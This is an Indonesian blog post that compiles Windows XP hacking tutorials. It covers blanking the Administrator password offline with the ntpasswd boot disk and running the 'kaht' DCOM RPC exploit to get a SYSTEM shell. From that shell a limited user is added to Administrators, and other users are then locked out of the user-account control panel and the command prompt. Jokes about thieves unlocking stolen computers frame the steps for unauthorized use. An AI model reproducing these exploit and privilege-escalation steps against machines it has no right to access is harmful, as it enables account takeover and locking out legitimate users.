Anda di sini : / / / menghilangkan pasword admin windows

03 September, 2008

menghilangkan pasword admin windows

Tekhnik Exploit Password WinXP


Kali ini saya akan mencoba untuk menjelaskan 2 teknik exploitasi pada windows XP, pertama melakukan pemanfaatan SAM files dan terakhir memanfaatkan RPC-nya Windows XP. Tekhnik kedua sebetulnya adalah kelanjutan dari artikelnya mRt di echo zine 10 yang membahas tentang Exploitasi Windows XP [pada fat32] dengan memanfaatkan sang Admin sendiri (hehuehuheue ... ) dan batch file yang disisipkan di start|program|startup oleh sang kriminal :), sedangkan kali ini yang saya bahas adalah jenis NTFS, yang tidak memiliki acces seperti pada fat32 untuk dapat menaruh batch file di folder start up nya sang Admin tersayang, sehingga apabila dipaksakan “Access Denied” adalah jawabannya. Apa akibatnya jika kita menggunakan kedua tekhnik diatas ?, yang jelas mah sama-sama buat orang seneng... heuheueehuhuehuee ! Jawab sendiri dah ...

Tekhnik pertama :
Yang kita butuhkan sekarang adalah :
Petter Recovery Password yang bisa di download dari situsnya langsung http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html sekalian sama infonya aja, biasanya sudah di sediakan dalam bentuk rar yang bisa di jadikan bootdisk. Yang penulis pakai untuk experimen kali ini yaitu versi bd040818 terdapat 3 file di dalamnya yakni bd040818.bin , install.bat , rawrite2.exe .
1 buah disket kosong dan layak pakai. :) --> untuk disket boot Petter Recovery Password.
Nekatzzzz ....

Kasusnya begini, misalnya ....anggap saja kita lupa password untuk login winXP nya. : ) atau kasus yang laen aja kali ya, yang lebih menantang ... hehehe. Misalnya ada rampok yang kebingungan nggak bisa login, padahal kompienya mo dijual ... huehueueheue. Ada yang kesindir nggak nih ??? Udah ah bcanda mulu. Langsung aja deuh ...

Langkah pertama ... Setelah Petter Recovery Password di jadikan bootdisk, langsung saja booting dengan disket tersebut ...
Langkah berikutnya, anda akan di tanya di drive mana SAM file berada. Tekan enter saja untuk defaultnya, setelah itu akan ditanyakan secara spesifik lagi, di direktori mana file SAM berada, biasanya untuk yang defaultnya tuh SAM file berada di /windows/system32/config, enter lagi aja untuk yang defaultnya. Setelah itu ....... Nah sampe disini anda akan di minta User mana yang ingin di ganti/hapus passwordnya. Lebih baik Administrators aja, karena yang kita lakukan saat ini kan mencari cara untuk menjadi SU di Windows XP. Biar gampang melakukan sesuatu nantinya .... hehehehe !!! Untuk eksperiment kali ini lebih baik anda membuat password Administrators menjadi blankpassword [* = blankpassword], supaya gampang nantinya, dan blankpassword merupakan pilihan terbaik dalam menggunakan Petter Password Recovery. Soalnya penulis sendiri telah belasan kali mencoba mengganti password para user dengan tetapi hanya 2 yang berhasil. Sudah ??? ... siiiip, tekan ! untuk mengakhir sesi reset password, dan q untuk mengakhiri scripts tersebut. Selanjutnya anda akan di tanya kembali, ingin mengulang atau tidak. Lebih baik tidak lahhhh ... Edit Completed. Catatan : Setelah menggunakan Petter Recovery Password, Windows berusaha untuk melakukan scandisk, system ne baru di acak-acak nie : ). Tunggu hingga proses scandisk selesai.
Setelah proses booting, anda akan di hadapkan dengan tampilan login yang seperti biasanya. ( Nggak menarik, hehehehe... ) Sekarang tekan ctrl+alt+del, tunggu sebentar dan kemudian tekan kembali ctrl+alt+del. Nah ada tampilan login yang clasic, seperti di windows 98 dulu. Dengan 2 textbox...


-------------------------------------------------
| Log On to Windows | x |
-------------------------------------------------
| User Name : Al-k |
| Password : ****** |
| |
| | Ok | | Cancel | | BLABLABLABLA....| |
-------------------------------------------------

Ya, bentuknya kira-kira seperti diatas ... : )...
Setelah itu ganti usernamenya menjadi Administrator, passwordnya di kosongkan saja, karena sebelumnya kita telah menjadikan blankpassword pada Administrator. Ok. Jreng-jreng-jreng... sekarang anda menjadi super user kembali. Silahkan buat account untuk anda sendiri.

Tekhnik Kedua :
Tiba saatnya kita maju bersama ... :D, memanfaatkan Massive RPC WinXP yang bobrok. Tekhnik kedua ini dibuat untuk para user yang memiliki acces limited. Yang dibuat kesal oleh sang admin, sehingga untuk menginstall suatu software harus minta izin dari sang Admin. :( . Yang dibutuhkan hanyalah acces untuk masuk ke command shell, dan satu tool kecil ‘kaht’ . Siap ???... buka command promptnya ... 

C:\Documents and Settings\Al-k>net user
User accounts for \\NOMATTER
-------------------------------------------------------------------------------
Administrator Al-k GNU-- keluarga --
Guest HelpAssistant SUPPORT_388945a0
VUSR_NOMATTER
The command completed successfully.
// Anggap saja disini Al-k adalah user yang limited
// Setelah itu masuk ke direktori di mana kaht berada
D:\Data+ku_>

Kemudian kita test dulu kaht-nya... bisa nggak nih kita nge-root.

  D:\Data+ku_>kaht 127.0.0.0 127.0.0.3
_________________________________________________

KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by aT4r@3wdesign.es
#haxorcitos && #localhost @Efnet Ownz you!!!
FULL VERSION? :) - AUTOHACKING
________________________________________________
 [+] Targets: 127.0.0.0-127.0.0.3 with 50 Threads
[+] Attacking Port: 135. Remote Shell at port: 34522
[+] Scan In Progress...
- Connecting to 127.0.0.2

Sending Exploit to a [WinXP] Server...
- Conectando con la Shell Remota...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Tuh kan dapet deh akses rootnya. Jangan seneng dulu. Langsung aja kita
buat akses user yang terbatas tadi menjadi Super User. 

C:\WINDOWS\system32> net localgroup Administrators Al-k /add

The command completed successfully.

Selanjutnya anda bisa login dengan user yang baru saja dirubah accountnya tadi. Dan anda bisa login ke account user lain yang memiliki akses sama seperti Administrator, tentunya dengan menghilangkan password user tersebut dulu sebelumnya. Dan anda bisa masuk ke regedit untuk menutup perizinan user account pada control panel :

HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/DisallowCpl/

, buat string baru dengan nama 1 dan ubah valuenya menjadi nusrmgr.cpl
Dan bisa anda disable akses ke command prompt kepada semua user. Sehingga anda menjadi SU yang benar-benar otoriter. Sayangnya tekhnik yang kedua ini hanya bisa di lakukan di Windows XP Service Pack 1. : (


// Refferensi :
- Seni Tekhnik Hacking 1 [S’to]
- Echo Zine 10, Exploitasi Windows XP [mRt]
- Iseng Instink

// Greetz :
- y3dips, Lirva32, z3r0byte ( Arabic Man :) ), the_day, S’to [duuh masuk TV tuk
yang kesekian kalinya nih ???] . & Echo staff who can’t mentioned 1 by 1.
- Alumni SMAN4 Bogor & All guy’s in STTTelematika Ciawi Bogor.
- Special for Jheseecka & Melati “Mel, ini artikel ke 1 dan ke 2-nya !!! :)“
- hg_ , Fel_c, Mentari^, the aeh, zacx, Azwa, Sita, Dulleh, Ibonx, weww, Qank-qunk,
AK47-angga, ninjaring
- Allguys in #yogyafree, Echo Member, #khilafah, #pribumi, #e-c-h-o, #freebase

http://www.ilmuwebsite.com/detil_hacking/12/_Tekhnik_Exploit_Password_WinXP/

masih bingun nich,,,
masih nyoba nyoba

o ya kalo mau file itu bisa jalan di USB
gini carane

To make a bootable USB drive / key:

1. Copy all files from this CD onto the USB drive.
It cannot be in a subdirectory on the drive.
You do not need delete files already on the drive.
2. Install the bootloader (you may have to be administrator)
On the USB drive, there should now be a file "syslinux.exe".
Run this from a command line, like this:

j:\syslinux.exe -ma j:


Bagaimana cara mereset password WindowsXp

Filed under: hacking

Sebetulnya sudah banyak yang telah membuat tutorial ini, namun karena saat aku check di milis dan di google.com yang mencari cara mereset password administrator windows xp masih banyak dan juga seperti yang tercatat di database topengdigital pencarian Mereset password admin windowsxp masih banyak . Jadi terpaksa aku coba buatin tutorialnya..sebetulnya gak jauh beda dengan tutorial disitus/blog yang lain.cuman disini aku meresetnya menggunakan vmware, hasilnya ok.lain kali aku upload videonya ke rapidshare + softwarenya cd070927.zip

Caranya anda harus mendownload dulu http://home.eunet.no/~pnordahl/ntpasswd/ saya sudah donwload cd070927,jika sudah download yang harus anda lakukan adalah membakar kedalam CD blank agar bisa digunakan untuk mereset password windows, yang harus anda perhatikan adalah merubah setting di bios agar first booting ditujukan ke CD/DVD Drive.agar program yang kita buat bisa bekerja maximal. Saya anggap anda sudah mempunyai software password reset administrator tersebut.

Langkah pertama
Masukan cd reseter tersebut kekomputer yang password adminnya anda lupa atau pura-pura lupa ( he..he..he ..) jika first bootingnya anda arahkan ke CD,pasti gambarnya seperti dibawa ini tampak seperti gambar 1.
Gbr 1

1top

jika didesktop anda tampil seperti itu,tekan saja enter,tunggu sampai keluar tulisan
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Step ONE :Selet disk where the windows ….
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
seperti pada gambar 2
Gbr 2
2top

jika muncul seperti diatas tekan aja enter, jangan diperhatikan tulisan yang membuat pusing kepala, yang penting enter lagi…Ha..ha..ha sampai muncul tulisan kayak dibawa ini gambar 3
gbr 3

3top1

gak usah pusing..jika sudah sampai step Two :
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Step TWO : Select Path and registry files
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::
What is the path to the registry directory?
tekan enter lagi aja, jangan pusing-pusing..? lihat tampilan gambar 4 setelah ditekan enter

Anda disuruh memilih,mereset password atau recoveryconsole,yang anda lakukan memilih nomor 1, jadi ketik saja 1 untuk meresetnya
gbr 4
4top
jika anda ketik angkah 1 dan tekan enter maka akan tampil seperti pada gambar 5
gbr 5

5top1

tekan enter lagi ya…! Pokoknya modalnya hanya enter..enter..1..enter..lihat gambar 6
Select : ! – quit ,- list user …..
Or Simply enter the username to change : Administrator
gbr 6
6top
tekan enter lagi, nah ini dia digambar 7 anda harus memilih/mengetikan 1 untuk menghapus password.
gbr 7
7top

selanjutnya tekan enter untuk mereset,lihat gambar 8
Select : (q) 1
Password Cleared!
Password windows sudah direset

gbr 8
8top

Namun anda harus tulis lagi tanda seru ( ! ) untuk menyimpan hasil reset password tadi ke windows xp.langsung ketik tanda ! tekan enter ( lihat gambar 9 )
gbr 9
9top

setelah itu tekan q enter untuk menyimpan
gbr 10
10top
Selanjutnya,langkah terakhir

:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Step Four : Writing back change
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
About to write file(s) back ! Do it [n] : y

Tekan Y,untuk menulis file sam hasil reset kita tadi ( menyimpan )

nah selesai ya. Tinggal ctrl + alt + del, ambil cdnya dan kita bisa masuk windows sebagai administrator.

Mudah bukan

Salam

Topengdigital

http://topengdigital.blogsome.com/2008/05/19/bagaimana-cara-mereset-password-windowsxp/

Bagikan

Jangan lewatkan

menghilangkan pasword admin windows
4 / 5
Oleh

Subscribe via email

Suka dengan artikel di atas? Tambahkan email Anda untuk berlangganan.

Diberdayakan oleh Blogger.